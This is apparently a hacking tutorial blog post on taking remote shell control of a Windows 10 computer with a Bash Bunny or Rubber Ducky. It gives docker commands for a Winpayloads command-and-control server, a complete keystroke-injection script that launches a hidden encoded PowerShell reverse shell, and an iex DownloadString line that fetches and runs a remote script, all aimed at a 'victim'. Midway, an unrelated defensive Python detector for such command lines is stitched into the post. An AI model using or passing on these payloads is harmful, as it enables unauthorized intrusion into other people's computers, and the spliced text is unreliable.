🐇 Hacking a Windows 10 Computer with the Bash Bunny or Rubber Ducky 🐤

This guide will show you the simplest way to get a remote shell connection on a Windows 10 target just by plugging in the Bash Bunny. This connection will give you command line control over the computer from a remote location, which I’d count as “hacking” a Windows computer.

This works equally well, and probably better, with a Rubber Ducky (because it works faster), but I don’t own a Rubber Ducky; the Bash Bunny is just what I had on hand. Most of the guide should work the same if you’re using a Rubber Ducky, since they both simulate a keyboard.

Setup

  1. Bash Bunny or Rubber Ducky
  2. Remote Server (VPS)
  3. L33T haxing skills

Number 3 is a lie. We’ll be using Winpayloads to generate PowerShell payloads and control our shell, all from one program. It’s a script kiddie’s dream! It takes just two commands to start running Winpayloads once you have a Virtual Private Server set up.

You could use any computer you own, but using a VPS service simplifies things. I recommend using DigitalOcean, but any VPS service that can launch a Linux instance will work. There are plenty of guides out there on how to use DigitalOcean. Debian or Ubuntu will work great. Using my referral link below will help support the upkeep of my own servers!

Then of course you need the hardware. Here’s a link to Hak5:

Command and Control

docker pull charliedean07/winpayloads:latest
docker run -e LANG=C.UTF-8 --net=host -it charliedean07/winpayloads

Then you should have Winpayloads launched and you’ll see this:

That’s it.

Creating Payload

That PowerShell string will be the heart of your Bash Bunny / Rubber Ducky payload. Plug in your device, navigate to where the payloads are to be placed, and put in the following code:

ATTACKMODE HID
LED B
Q GUI r
Q DELAY 500
Q STRING powershell
Q DELAY 250
Q ENTER
Q DELAY 2000
Q STRING powershell.exe -w hidden -noni -enc [YOUR PAYLOAD HERE]
Q DELAY 500
Q ENTER
LED G

Your payload will be different each time you generate it with Winpayloads. The base64 string that contains your reverse shell payload starts right after the -noni -enc part. Copy the base64 part and paste it over where it says [YOUR PAYLOAD HERE] like so:

Save the file and dismount your device; it’s now ready for attack.
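The command this script types, powershell.exe -w hidden -noni -enc followed by base64, ends up in process-creation telemetry (Windows event ID 4688 with command-line auditing, or Sysmon event ID 1). The following is an added example, not part of the original post or of Winpayloads: it flags that switch combination, including the longer spellings PowerShell accepts, and decodes the -enc argument, which is base64 over UTF-16LE text. The function names and sample command lines are constructed for illustration, and it assumes the command line can be split on whitespace.

```python
import base64
import binascii
import re

PS_BINARY = re.compile(r"(?i)(^|[\\/])(powershell|pwsh)(\.exe)?$")

def is_param(token, full_name, min_len=1):
    """True if token is a -Param or /Param abbreviation of full_name."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return len(name) >= min_len and full_name.startswith(name)

def decode_enc(arg):
    """-EncodedCommand is base64 over UTF-16LE text; None if it is not."""
    try:
        return base64.b64decode(arg, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def analyze(cmdline):
    """Return findings for a PowerShell command line, or None for other processes."""
    tokens = cmdline.split()
    if not tokens or not PS_BINARY.search(tokens[0].strip('"')):
        return None
    found = {"hidden": False, "noninteractive": False, "encoded": False, "script": None}
    for tok, nxt in zip(tokens[1:], tokens[2:] + [""]):
        if is_param(tok, "windowstyle") and nxt.lower() == "hidden":
            found["hidden"] = True
        elif is_param(tok, "noninteractive", min_len=3):
            found["noninteractive"] = True
        elif is_param(tok, "encodedcommand") and nxt:
            found["encoded"] = True
            found["script"] = decode_enc(nxt)  # what the blob actually runs
    # Hidden window plus an encoded command is the pattern worth an alert.
    found["alert"] = found["hidden"] and found["encoded"]
    return found

def sample_lines():
    """Constructed command lines standing in for process-creation log fields."""
    b64 = base64.b64encode('Write-Output "constructed sample"'.encode("utf-16-le")).decode()
    return [
        f"powershell.exe -w hidden -noni -enc {b64}",
        rf"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -EncodedCommand {b64}",
        r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
        "notepad.exe report.txt",
    ]

if __name__ == "__main__":
    for line in sample_lines():
        print(analyze(line), "<-", line[:60])
```
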

Attack

Plug in your device.

The payload will take ~10 seconds to initiate if you’re using a Bash Bunny.

You should receive a connection back on your command and control server from whatever IP address your victim is connecting to the internet from.

Type client then 1 to begin controlling the Windows computer.

You can run any commands on your target, read files, launch more malware, or do some harmless fun like rickrolling them with this command (don’t run strange scripts on computers or networks you care about):

iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")
